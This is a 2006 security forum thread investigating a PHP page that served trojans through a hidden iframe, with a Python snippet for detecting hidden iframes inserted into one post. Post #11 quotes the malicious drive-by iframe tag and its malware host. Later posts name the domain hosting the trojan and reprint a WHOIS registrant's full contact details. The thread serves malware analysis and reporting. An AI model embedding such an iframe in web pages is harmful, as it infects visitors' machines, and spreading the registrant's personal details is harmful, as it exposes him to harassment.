-
August 7th, 2006, 03:00 AM
#11
FYI, that PHP page has a hidden iFrame that is pulling down a page from some site on IP 85.255.113.10.
<iframe width=2 height=2 style=visibility:hidden src='http://85.255.113.10/?to=GLAC&from=se-all&type=se-all'></iframe>
That site is down with a message saying the account is suspended due to violation of AUP - good.
Kinda hoped to pull down that horsie and analyze and dissect it, oh well.
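A small detector for the kind of hidden iframe quoted above, added here as an example (it is not the poster's code): it walks a page's HTML and flags iframes that are hidden by inline style or shrunk to a few pixels, and reports the host each one pulls from. The sample HTML below is constructed around the iframe tag from this thread.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: the hidden iframe quoted in this thread embedded in a
# small page, plus a normal-sized iframe that should not be flagged.
SAMPLE_HTML = """<html><body><p>hello</p>
<iframe width=2 height=2 style=visibility:hidden src='http://85.255.113.10/?to=GLAC&from=se-all&type=se-all'></iframe>
<iframe width=400 height=300 src='https://example.com/embed'></iframe>
</body></html>"""

# Frames at or below this many pixels on both axes are treated as hidden.
TINY_PX = 5


def _px(value):
    """Parse a width/height attribute; returns an int pixel count or None."""
    if value is None:
        return None
    v = value.strip().lower()
    if v.endswith("px"):
        v = v[:-2]
    return int(v) if v.isdigit() else None


class HiddenIframeFinder(HTMLParser):
    """Collects iframes that are hidden by style or sized down to nothing."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        reasons = []
        style = a.get("style", "").replace(" ", "").lower()
        if "visibility:hidden" in style or "display:none" in style:
            reasons.append("style hides frame")
        w, h = _px(a.get("width")), _px(a.get("height"))
        if w is not None and h is not None and w <= TINY_PX and h <= TINY_PX:
            reasons.append(f"tiny size {w}x{h}")
        if reasons:
            src = a.get("src", "")
            self.findings.append(
                {"src": src, "host": urlparse(src).hostname or "", "reasons": reasons}
            )


def find_hidden_iframes(html):
    """Return a list of {src, host, reasons} dicts for suspicious iframes."""
    parser = HiddenIframeFinder()
    parser.feed(html)
    parser.close()
    return parser.findings
```

Run it over a saved copy of the page; each finding's host is the address to block at the proxy or report to the hosting provider.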
-
August 7th, 2006, 04:34 AM
#12
Originally posted here by ric-o
FYI, that PHP page has a hidden iFrame that is pulling down a page from some site on IP 85.255.113.10.
That site is down with a message saying the account is suspended due to violation of AUP - good.
Kinda hoped to pull down that horsie and analyze and dissect it, oh well.
Still a live link, just got another (same one as before) Trojan in my Quar.
W32/Sober@MM!M681
Get some good religion from Bad Religion.
-
August 7th, 2006, 02:09 PM
#13
http ://85.255.113.10/ ?to=GLAC&from=se-all&type= se-all
One Whois lookup says it's from the Ukraine.... another says it's from Belarus:
Country fraud profile: High
Georgia prison wardens......Ukrainian mafioso....
Hmmm
%42%75%75%75%75%72%70%21%00
-
August 8th, 2006, 12:13 AM
#14
One Whois lookup says it's from the Ukraine.... another says it's from Belarus:
same area of land
and Georgia is also out there too
not just in the USofA
maybe that's how you picked such a lovely site
and clicking the link sent AVG nuts
got two hits
those two hits have different dates on em
but I am certain I've checked the vault recently, and I haven't sent anything else there for a while
so now I'm in my SIXTIES FFS
WTAF, how did that happen, so no more alterations to the sig, it will remain as is now
Beware of Geeks bearing GIF's
come and waste the day :P at The Taz Zone
-
August 8th, 2006, 01:45 AM
#15
!!!!!!!!!!
No response via telephone to the site host, sent a very polite e-mail, we will see if they respond. I have my doubts.
Get some good religion from Bad Religion.
-
August 8th, 2006, 02:10 AM
#16
There is only one constant, one universal, it is the only real truth: causality. Action. Reaction. Cause and effect...There is no escape from it, we are forever slaves to it. Our only hope, our only peace is to understand it, to understand the 'why'. 'Why' is what separates us from them, you from me. 'Why' is the only real social power, without it you are powerless.
(Merovingian - Matrix Reloaded)
-
August 8th, 2006, 01:33 PM
#17
Nihil, I've already submitted them; I did so about 30 minutes after catching them in a contained environment.
cheers
acidtone..
-
August 8th, 2006, 05:19 PM
#18
Get some good religion from Bad Religion.
-
August 9th, 2006, 07:33 PM
#19
The continuing saga
Damnit I am obsessed!
OK so I just can't let this one go, after Zero response to both methods (telephone, and e-mail) to the host of the offending website, I am once again digging for more info.
I did report it to DShield, and they are so backed up it will take a while for them to "act", which means they will send an e-mail to the Sysadmin, and hope that action will be taken. Basically the same thing I have attempted.
Knowing that the Horsie is there, I have no fear in rooting around within the site. I noticed today that the actual Trojan originates from the following site. Apparently notorious for this activity and also registered in Russia..........good luck getting any results from these guys right?
The site you will notice serves no purpose, other than to support the Downloader/Trojan, and god knows what else.
http://proffy209.com/
Dig-
Registrant:
Boris D Gorbunov boris@bo.ca
7.49800872092
Boris D Gorbunov
Proletarskaya 3-10
Nijnoy Novgorod Nijniy Novgorod RUSSIAN FEDERATION 180092
Domain Name: proffy209.com
Record last updated at 2006-07-13 12:42:55
Record created on 2006/7/13
Record expired on 2007/7/13
Domain servers in listed order:
ns1.game4all.biz ns2.game4all.biz
Administrator:
name: (Boris D Gorbunov)
Email: boris@bo.ca
tel-- 7.49800872092
Boris D Gorbunov
Proletarskaya 3-10
Boris I would like to kick your Caviar eating a$$.
The Virus itself is also known as TR/Dldr.Tibs.C, which copies itself to %SYSDIR%\kernels8.exe, is a multifaceted little bugger.
Further info can be found @ link below.
http://www.avira.com/en/threats/sect...dr.tibs.c.html
Any thoughts/Ideas/suggestions regarding these A$$hats would be great. I am on a mission.
Get some good religion from Bad Religion.